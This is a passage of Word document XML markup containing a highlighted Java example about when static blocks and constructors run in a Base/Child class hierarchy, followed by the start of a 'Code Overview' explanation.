          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355BF54" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Child Static"</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99CC87" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66482B7C" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B92915" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Child</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A0031" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Child Constructor"</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096317E" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF57283" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F36C6DC" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3377B366" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> child1 </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Child</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122A22DB" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> child2 </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Child</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7587D404" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DDA0F3" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F748217" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E3DDA2" w14:textId="6B5C7120" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="0008690C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Code Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA6D5D" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Base Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0256A3" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A static block prints "Base Static".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC27A7C" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A constructor prints "Base Constructor".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E1EDFF" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
